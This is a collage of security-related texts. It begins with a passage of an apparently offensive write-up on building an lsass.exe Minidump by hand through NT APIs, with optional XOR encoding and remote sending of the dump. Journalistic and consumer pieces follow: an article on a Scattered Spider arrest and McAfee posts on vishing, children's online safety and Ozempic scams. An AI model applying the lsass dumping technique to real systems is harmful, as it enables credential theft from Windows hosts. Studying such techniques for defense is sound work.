The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:
public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}
As there is only one, it gets simplified to:
public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}
The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)
Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.
public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}
Each module entry is a 16-bytes structure:
public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}
The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them
There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:
With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream
After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.
A 22-year-old man from the United Kingdom arrested this week in Spain is allegedly the ringleader of Scattered Spider, a cybercrime group suspected of hacking into Twilio, LastPass, DoorDash, Mailchimp, and nearly 130 other organizations over the past two years.
The Spanish daily Murcia Today reports the suspect was wanted by the FBI and arrested in Palma de Mallorca as he tried to board a flight to Italy.
A still frame from a video released by the Spanish national police shows Tylerb in custody at the airport.
“He stands accused of hacking into corporate accounts and stealing critical information, which allegedly enabled the group to access multi-million-dollar funds,” Murcia Today wrote. “According to Palma police, at one point he controlled Bitcoins worth $27 million.”
The cybercrime-focused Twitter/X account vx-underground said the U.K. man arrested was a SIM-swapper who went by the alias “Tyler.” In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls sent to the victim — including one-time passcodes for authentication, or password reset links sent via SMS.
“He is a known SIM-swapper and is allegedly involved with the infamous Scattered Spider group,” vx-underground wrote on June 15, referring to a prolific gang implicated in costly data ransom attacks at MGM and Caesars casinos in Las Vegas last year.
Sources familiar with the investigation told KrebsOnSecurity the accused is a 22-year-old from Dundee, Scotland named Tyler Buchanan, also allegedly known as “tylerb” on Telegram chat channels centered around SIM-swapping.
In January 2024, U.S. authorities arrested another alleged Scattered Spider member — 19-year-old Noah Michael Urban of Palm Coast, Fla. — and charged him with stealing at least $800,000 from five victims between August 2022 and March 2023. Urban allegedly went by the nicknames “Sosa” and “King Bob,” and is believed to be part of the same crew that hacked Twilio and a slew of other companies in 2022.
Investigators say Scattered Spider members are part of a more diffuse cybercriminal community online known as “The Com,” wherein hackers from different cliques boast loudly about high-profile cyber thefts that almost invariably begin with social engineering — tricking people over the phone, email or SMS into giving away credentials that allow remote access to corporate internal networks.
One of the more popular SIM-swapping channels on Telegram maintains a frequently updated leaderboard of the most accomplished SIM-swappers, indexed by their supposed conquests in stealing cryptocurrency. That leaderboard currently lists Sosa as #24 (out of 100), and Tylerb at #65.
In August 2022, KrebsOnSecurity wrote about peering inside the data harvested in a months-long cybercrime campaign by Scattered Spider involving countless SMS-based phishing attacks against employees at major corporations. The security firm Group-IB called the gang by a different name — 0ktapus, a nod to how the criminal group phished employees for credentials.
The missives asked users to click a link and log in at a phishing page that mimicked their employer’s Okta authentication page. Those who submitted credentials were then prompted to provide the one-time password needed for multi-factor authentication.
These phishing attacks used newly-registered domains that often included the name of the targeted company, and sent text messages urging employees to click on links to these domains to view information about a pending change in their work schedule. The phishing sites also featured a hidden Telegram instant message bot to forward any submitted credentials in real-time, allowing the attackers to use the phished username, password and one-time code to log in as that employee at the real employer website.
One of Scattered Spider’s first big victims in its 2022 SMS phishing spree was Twilio, a company that provides services for making and receiving text messages and phone calls. The group then pivoted, using their access to Twilio to attack at least 163 of its customers.
A Scattered Spider phishing lure sent to Twilio employees.
Among those was the encrypted messaging app Signal, which said the breach could have let attackers re-register the phone number on another device for about 1,900 users.
Also in August 2022, several employees at email delivery firm Mailchimp provided their remote access credentials to this phishing group. According to Mailchimp, the attackers used their access to Mailchimp employee accounts to steal data from 214 customers involved in cryptocurrency and finance.
On August 25, 2022, the password manager service LastPass disclosed a breach in which attackers stole some source code and proprietary LastPass technical information, and weeks later LastPass said an investigation revealed no customer data or password vaults were accessed.
However, on November 30, 2022 LastPass disclosed a far more serious breach that the company said leveraged data stolen in the August breach. LastPass said criminal hackers had stolen encrypted copies of some password vaults, as well as other personal information.
In February 2023, LastPass disclosed that the intrusion involved a highly complex, targeted attack against an engineer who was one of only four LastPass employees with access to the corporate vault. In that incident, the attackers exploited a security vulnerability in a Plex media server that the employee was running on his home network, and succeeded in installing malicious software that stole passwords and other authentication credentials. The vulnerability exploited by the intruders was patched back in 2020, but the employee never updated his Plex software.
Plex announced its own data breach one day before LastPass disclosed its initial August intrusion. On August 24, 2022, Plex’s security team urged users to reset their passwords, saying an intruder had accessed customer emails, usernames and encrypted passwords.
Sosa and Tylerb were both subjected to physical attacks from rival SIM-swapping gangs. These communities have been known to settle scores by turning to so-called “violence-as-a-service” offerings on cybercrime channels, wherein people can be hired to perform a variety geographically-specific “in real life” jobs, such as bricking windows, slashing car tires, or even home invasions.
In 2022, a video surfaced on a popular cybercrime channel purporting to show attackers hurling a brick through a window at an address that matches the spacious and upscale home of Urban’s parents in Sanford, Fl.
January’s story on Sosa noted that a junior member of his crew named “Foreshadow” was kidnapped, beaten and held for ransom in September 2022. Foreshadow’s captors held guns to his bloodied head while forcing him to record a video message pleading with his crew to fork over a $200,000 ransom in exchange for his life (Foreshadow escaped further harm in that incident).
According to several SIM-swapping channels on Telegram where Tylerb was known to frequent, rival SIM-swappers hired thugs to invade his home in February 2023. Those accounts state that the intruders assaulted Tylerb’s mother in the home invasion, and that they threatened to burn him with a blowtorch if he didn’t give up the keys to his cryptocurrency wallets. Tylerb was reputed to have fled the United Kingdom after that assault.
KrebsOnSecurity sought comment from Mr. Buchanan, and will update this story in the event he responds.
By now you’ve probably heard of the term “phishing”—when scammers try to fool you into revealing your personal info or sending money, usually via email — but what about “vishing”? Vishing, or voice phishing, is basically the same practice, but done by phone.
There are a few reasons why it’s important for you to know about vishing. First off, voice phishing scams are prevalent and growing. A common example around tax season is the IRS scam, where fraudsters make threatening calls to taxpayers pretending to be IRS agents and demanding money for back taxes. Another popular example is the phony tech support scam, in which a scammer calls you claiming that they represent a security provider.
The scammers might say they’ve noticed a problem with your computer or device and want money to fix the problem, or even request direct access to your machine. They might also ask you to download software to do a “security scan” just so they can get you to install a piece of malware that steals your personal info. They might even try to sell you a worthless computer warranty or offer a phony refund.
These kinds of attacks can be very persuasive because the scammers employ “social engineering” techniques. This involves plays on emotion, urgency, authority, and even sometimes threats. The end result, scammers manipulate their victims into doing something for fraudulent purposes. Because scammers can reach you at any time on your most private device, your smartphone, it can feel more direct and personal.
Vishing scams don’t always require a phone call from a real person. Often, scammers use a generic or targeted recording, claiming to be from your bank or credit union. For instance, they might ask you to enter your bank account number or other personal details, which opens you up to identity theft.
Increasingly, scammers use AI tools in voice cloning attacks. With readily available voice cloning apps, scammers can replicate someone else’s voice with remarkable accuracy. While initially developed for benign purposes such as voice assistants and entertainment, scammers now use voice cloning tools to exploit unsuspecting victims.
The incoming number might even appear to have come from your bank, thanks to a trick called “caller ID spoofing,” which allows scammers to fake the origin of the call. They can do this by using Voice over Internet Protocol (VoIP) technology, which connects calls over the internet instead of traditional phone circuits, allowing them to easily assign incoming phone numbers.
Don’t risk losing your money or valuable personal info to these scams. Here’s how to avoid vishing attacks:
The post How to Avoid Being Phished by Your Phone appeared first on McAfee Blog.
I often joke about how I wish I could wrap up my kids in cotton wool to protect them from all the challenges of the real world. When they were little, I would have loved to protect them from some of the trickier kids in the playground. But as they got older, it was all about the internet and of course, alcohol, drugs and fast cars!
Unfortunately, I don’t have solutions for all of the above parenting challenges but with over 12 years of experience as Cybermum, I know a thing or two about keeping kids safe online.
The CEOs of the world’s largest social media platforms were recently summoned to a Senate Judicial Committee hearing in Washington. The Kids Online Safety Act (KOSA) is still being heavily debated and representatives from Meta, Discord, TikTok, Snap and X, the company formerly known as Twitter, were invited to participate in the hearing. Designed to regulate social media and better protect children, the proposed bill has a lot of support but there is still a way to go before it takes its final shape and potentially becomes law.
In my opinion, there’s no question that governments worldwide need to play a bigger, more vocal role in this arena and insist on better protections for all social media users, particularly our kids. In 2019, Australia passed its own Online Safety Act and the UK did the same in 2023 with its Online Safety Law. And while these are all very important steps forward, I honestly believe that the role families play in teaching their kids about online safety is even more important.
I totally understand that teaching kids about online safety can just feel like another task on a never-ending to-do list. I’ve been there! But think of it like this. Haven’t you been talking to your kids about sun safety and road safety along the way? You know, dropping in little reminders and tips as you drop them at school or pick them up from a play date? Well, this is how you need to think about online safety. Focus on breaking it down into little chunks so it doesn’t feel hard.
Now that we have our mindset sorted, let me share my top tips for helping your kids stay safe while they are online.
As soon as your kids can pick up a device, your conversations about online safety need to start. Yes, I know it might seem ridiculous, but it is THE best way to help ‘mould and shape’ your offspring’s mind in a cyber-safe way. If your 2-year-old likes to play games on your iPad, it could be as simple as:
And when your kids get older, weave in more age-appropriate messages, such as:
Spending time online with your child from an early age is another great way of helping them understand the difference between good and bad content. And modelling good digital citizenship while you are online with your kids will help ‘mould and shape’ their understanding of how to interact safely and positively.
I’m a big fan of ensuring kids have clarity on boundaries and expectations, particularly when it comes to all things online. Your easiest fix here? A family technology agreement. I love a family technology agreement because it can be tailored to your kids, their ages and maturity levels. Check out my previous blog post on how to develop one for your family here. One final piece of advice here – don’t start introducing tech contracts during a family blow up. Please wait till everyone is calm otherwise I can assure you, you’ll encounter resistance from some family members!
There are a few key fundamental basics that I think every child needs to know to keep themselves safe online. Here are my top 5:
I would also include these basics in your family technology contract.
As your kids get older, it becomes harder to monitor their every move online. Yes, you can create bookmarks with ‘approved’ sites and install parental controls however it is inevitable that there will be an opportunity for unsupervised internet usage. But if you have helped your kids develop critical thinking skills then it is far more likely that they will be able to navigate the internet is a safe and responsible way.
Where to start? Always encourage a healthy scepticism and encourage them to not accept that everything they read online is true. When it is age-appropriate, help them to identify reliable sources, spot less reliable websites, and question the underlying purpose of the information that has been shared.
Taking some time to understand how your child spends their time online is the best way of truly understanding the risks and challenges they face. And when you understand the risks they face, you can help them prepare for them. So, join ALL the social media platforms your kids are on, play their games and download their messaging apps. Not only will you develop a better understanding of how to manage the privacy settings on each of the platforms, but the often very specific language used and the online culture can often form a big part of your child’s life. And the best part – if they know you understand their world, you will develop a little ‘tech cred’ which means that they will be more likely to come to you with any issues or problems that may face online. Awesome!
A set of good-quality parental controls can be a wonderful addition to any digital parenting toolkit. Many will allow you to filter the content your child sees, block certain websites, and even track your child’s browsing history and location. But please remember, no parental controls will ever replace an invested parent! Check out McAfee’s website for more information.
Now, I know that might feel like a lot but please don’t stress. Simply chunk it down and give yourself a new task every week such as joining a new social media platform or playing your child’s favourite online game. The most important thing to remember is to keep talking to your kids. Why not start the conversation by asking them for advice or, sharing something you saw online? Remember, your goal here is to get yourself some tech cred! Good luck!!
Alex xx
The post How to Keep Your Kids Safe Online appeared first on McAfee Blog.
As pharmacies each week fill more than one million prescriptions for Ozempic and other GLP-1 weight loss drugs, scammers are cashing in on the demand. Findings from our Threat Research Team reveal a sharp surge in Ozempic and weight loss scams online.
Any time money and scarcity meet online, you’ll find scammers. That’s what we have here with Ozempic and weight loss scams.
Doctors have prescribed GLP-1 drugs to treat diabetes for nearly two decades. Demand spiked with the U.S. Food and Drug Administration’s (FDA) approval of several GLP-1 drugs for weight loss.
Now, what was a $500 million market for the drug in 2020 stands to clear more than $7.5 billion in 2024.[i] As a result, these drugs are tough to come by as pharmaceutical companies struggle to keep up.
McAfee’s Threat Research Team uncovered just how prolific these weight-loss scams have become. Malicious websites, scam emails and texts, posts on social media, and marketplace listings all round out the mix.
Across all these scams, they offer to accept payment through Bitcoin, Zelle, Venmo, and Cash App. All are non-standard payment methods for prescription drugs and are certain red flags for scams.
Example of a scam website
Also common to these scams: a discount. McAfee researchers discovered several scams that offered bogus drugs at a discount if victims paid in cryptocurrency. Others offered them at greatly reduced prices, well under the $1,000 per dose — the legitimate drug’s cost.
Bogus Craigslist ad
As with so many scams, you can file these Ozempic and weight loss scams under “Too Good To Be True.” Steep discounts and offers to purchase the drugs without a prescription are sure-fire signs of a scam. And with this scam comes significant risks.
These scams can rip you off, harm your health, or both.
In many instances, these scams never deliver. Anything at all. The scam sites simply pocket the money in return for nothing. Further, many steal personal and financial info to commit identity theft down the road.
In some cases, scammers do indeed deliver. Yet instead of receiving an injection pen with the proper drug, scammers send EpiPens loaded with allergy medication, insulin pens, or pens loaded with a saline solution.
One scam victim shared her story with us after she got scammed with a phony pen:
“I started using Ozempic in February 2023, as part of managing my diabetes. At first, it was reliably in stock but when it got more popular a few months later, stock got really low.
Around September, it got really hard to find Ozempic in stock and there was about a month and a half when my mom and I couldn’t find it at all. I mentioned it to a co-worker, who said she had a friend selling it. I was skeptical but did know her friend was connected to the medical industry and the price was only slightly higher than what I’d been paying. It didn’t sound outrageous, so I decided we’d try it. I got the product and gave her the money.
When we opened the box up, it didn’t look or feel right. The packaging felt flimsy and the pen looked quite different from the one we had been using. My mom inspected it and immediately noticed something was wrong. I took photos and videos and with my doctor’s help, we got in touch with a rep [from the legitimate pharma company], who confirmed it was fake. It wasn’t Ozempic, it was an insulin pen.
Realizing that I’d almost injected myself with the wrong substance, thinking it was Ozempic, was terrifying and could have been fatal. It’s really scary to think about what could have happened if we hadn’t done a careful double-check.”
This story frames exactly what’s at stake with Ozempic and weight loss scams. Unlike the bulk of online scams out there, these scams can lead to physical harm — which makes the need to avoid them that much more urgent.
Remember, buying Ozempic or similar drugs without a prescription is illegal. That makes selling these drugs on social media like Facebook Marketplace, Craigslist, or other related sites illegal as well. Further, watch out for foreign pharmacies and sites you’re not familiar with. Per the FDA, they might sell drugs unapproved by the FDA. Likewise, they might be phony.
Only buy from reputable pharmacies. You can check a pharmacy’s license through your state board of pharmacy (this link from the FDA can help you track that down). If the pharmacy you’re considering isn’t listed, don’t use it. Also, make sure it has a phone number and physical address in the U.S.
Watch out for unreasonably low prices. Once again, if an offer is too good to be true, it probably is. In addition, never use a digital wallet app, bitcoin, prepaid debit cards, or wire funds to pay for your prescription. PayPal, Apple Pay, or a credit card payment are typical options for legitimate pharmacies.
Keep an eye out for website errors and missing product details. Scam websites typically lack verifiable product info. Pay attention to and read the fine print. Look for product batch numbers, expiration dates, or manufacturer details to confirm what you’re purchasing is legit. Other sites fail the eye test, as they look poorly designed and have grammar issues.
A poorly written scam on social media…
Look for misleading claims. If any drug offers rapid weight loss or miracle cures, be on guard. Purchasing counterfeit Ozempic poses significant health risks, including exposure to harmful substances, incorrect dosages, and lack of therapeutic effects. In addition to financial loss, you can experience adverse reactions or worsening of your condition by purchasing ineffective or counterfeit medications.
Consider AI-powered scam protection. McAfee Scam Protection uses AI to detect and block dangerous links that scammers drop into emails, text messages, and social media messages. Additionally, McAfee Web Protection detects and blocks links to scam sites that crop up in search and while browsing.
Stay vigilant. Scammers create fake profiles across social media channels. Do not blindly trust sellers on Telegram, Craigslist, Facebook, TikTok. Many scammers are using these to run their operations. Don’t believe testimonials either! Scammers use fake testimonials to build trust.
Truly, these scams can cause great harm. They can take a toll on your finances and your health. The good news here is that you can avoid them entirely.
This stands as a good reminder…when something gets popular and scarce, it spawns scams. That’s what we’re seeing with these in-demand drugs. And it’s just as we’ve seen before with popular toys around the holidays and even rental cars during peak periods of travel. Where there’s a combination of urgency, need, and money, your chances of stumbling across a scam increase.
[i] https://www.jpmorgan.com/insights/global-research/current-events/obesity-drugs
The post How Ozempic Scams Put People’s Finances and Health at Risk appeared first on McAfee Blog.
